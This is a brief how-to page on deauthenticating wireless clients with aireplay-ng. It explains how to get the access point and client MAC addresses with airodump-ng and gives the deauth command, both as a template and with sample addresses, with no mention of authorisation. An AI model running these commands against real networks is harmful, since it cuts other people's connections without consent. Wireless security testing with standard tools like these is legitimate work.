How-To: Deauth Clients

You need to know the following:

  • The MAC address of the station (AP)
  • The MAC address of the client to deauth

If you don't have these addresses, you can get them by monitoring the network using something like airodump-ng.

Then just do the following:

aireplay-ng --deauth 1 -a STATIONMAC -c CLIENTMAC mon0

So for example if the AP station has an address of AB:CD:EF:01:23:45 and the client computer/phone has an address of 12:34:56:78:90:AB the command would be:

aireplay-ng --deauth 1 -a AB:CD:EF:01:23:45 -c 12:34:56:78:90:AB mon0

That's it. :)

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License